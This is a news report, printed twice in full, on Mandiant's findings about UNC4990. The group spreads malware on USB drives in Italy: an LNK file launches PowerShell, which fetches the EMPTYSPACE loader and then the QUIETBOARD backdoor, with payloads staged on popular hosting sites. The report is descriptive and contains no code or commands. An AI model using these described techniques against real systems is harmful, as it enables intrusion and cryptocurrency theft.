The UNC4990 group proved that even obsolete techniques are still quite effective.
Cybercriminals known as UNC4990 have been active in Italy, using infected USB devices to attack various industries, including healthcare, transportation, construction and logistics. This was announced by Mandiant on January 30.
The UNC4990 group, which has been active since the end of 2020, is supposedly based in Italy. They use an Italian infrastructure to manage and control (C2) their operations. The main attack method is to distribute malicious software via USB, which then leads to the installation of the EMPTYSPACE boot loader.
Attackers use sites such as GitHub, Vimeo, and Ars Technica to host additional payloads. At the same time, malicious files are downloaded and decrypted from these sites using PowerShell.
The ultimate goals of UNC4990 are still unclear, although in one of the cases, experts identified the use of a cryptocurrency miner, which may indicate the financial motives of the group.
In early December, the same malicious campaign was documented by researchers from Fortgale and Yoroi . Infection starts when the victim runs a malicious LNK file on a removable USB device, which causes the PowerShell script responsible for downloading EMPTYSPACE from a remote server to run.
Yoroi identified four varieties of EMPTYSPACE, written in Golang, .NET, and Node.js and Python. These options are used to download the next stages of malware from the C2 server, including QUIETBOARD.
QUIETBOARD is a Python backdoor with a wide range of features: from executing arbitrary commands to changing the addresses of cryptocurrency wallets and collecting information about the system. The backdoor is also able to extend to removable drives and take screenshots.
Although attackers use popular sites to host their malware, Mandiant experts assure that the content of these sites does not pose a direct threat to ordinary users, since the hosted programs are harmless in isolation.
Analysis of EMPTYSPACE and QUIETBOARD also shows that attackers use a modular approach in the development of their tools, demonstrating an experimental approach and adaptability.
The considered cyber incident proves that even frankly old methods of compromise, such as the distribution of infected USB media, still work effectively, and built-in security systems often cannot recognize them.
Such attacks indicate the need for continuous improvement of cyber defense measures in order to stay ahead of hackers actions. Only an integrated approach, including technologies, processes and the human factor, can ensure the proper level of security.
Cybercriminals known as UNC4990 have been active in Italy, using infected USB devices to attack various industries, including healthcare, transportation, construction and logistics. This was announced by Mandiant on January 30.
The UNC4990 group, which has been active since the end of 2020, is supposedly based in Italy. They use an Italian infrastructure to manage and control (C2) their operations. The main attack method is to distribute malicious software via USB, which then leads to the installation of the EMPTYSPACE boot loader.
Attackers use sites such as GitHub, Vimeo, and Ars Technica to host additional payloads. At the same time, malicious files are downloaded and decrypted from these sites using PowerShell.
The ultimate goals of UNC4990 are still unclear, although in one of the cases, experts identified the use of a cryptocurrency miner, which may indicate the financial motives of the group.
In early December, the same malicious campaign was documented by researchers from Fortgale and Yoroi . Infection starts when the victim runs a malicious LNK file on a removable USB device, which causes the PowerShell script responsible for downloading EMPTYSPACE from a remote server to run.
Yoroi identified four varieties of EMPTYSPACE, written in Golang, .NET, and Node.js and Python. These options are used to download the next stages of malware from the C2 server, including QUIETBOARD.
QUIETBOARD is a Python backdoor with a wide range of features: from executing arbitrary commands to changing the addresses of cryptocurrency wallets and collecting information about the system. The backdoor is also able to extend to removable drives and take screenshots.
Although attackers use popular sites to host their malware, Mandiant experts assure that the content of these sites does not pose a direct threat to ordinary users, since the hosted programs are harmless in isolation.
Analysis of EMPTYSPACE and QUIETBOARD also shows that attackers use a modular approach in the development of their tools, demonstrating an experimental approach and adaptability.
The considered cyber incident proves that even frankly old methods of compromise, such as the distribution of infected USB media, still work effectively, and built-in security systems often cannot recognize them.
Such attacks indicate the need for continuous improvement of cyber defense measures in order to stay ahead of hackers actions. Only an integrated approach, including technologies, processes and the human factor, can ensure the proper level of security.
